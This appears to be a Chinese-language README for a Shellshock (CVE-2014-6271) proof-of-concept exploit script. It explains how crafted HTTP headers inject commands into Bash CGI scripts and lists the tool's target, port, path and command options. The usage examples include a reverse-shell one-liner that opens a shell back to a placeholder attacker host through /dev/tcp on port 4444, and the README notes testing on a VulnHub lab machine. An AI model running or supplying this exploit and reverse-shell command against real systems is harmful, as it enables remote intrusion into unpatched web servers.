由 infrar3d 利用
本仓库包含针对 CVE-2014-6271(Shellshock) 的概念验证漏洞利用代码。
Shellshock 是 GNU Bash 中的一个严重漏洞,精心构造的环境变量允许执行任意命令。
当 Web 服务器将 HTTP 头部传递给调用 Bash 的 CGI 脚本时,攻击者可以通过这些头部注入命令。
./shellshock_exp.sh -h
shellshock_exp.sh [options]
Options:
-h | --help 显示此消息并退出
-a | --address 目标地址(默认为 "localhost")
-p | --port 目标端口(默认为 80)
-f | --file 目标文件(默认为 "/cgi-bin/shell.sh")
-c | --command 在目标机上执行的命令(默认为 "id")
./shellshock_exp.sh -a 192.168.1.10
./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
(已在 VulnHub 靶机 "Hacksudo - Thor" 上测试)
本软件及概念验证代码仅提供用于教育和研究目的。
您有责任遵守所有适用法律。请合乎道德且负责任地使用。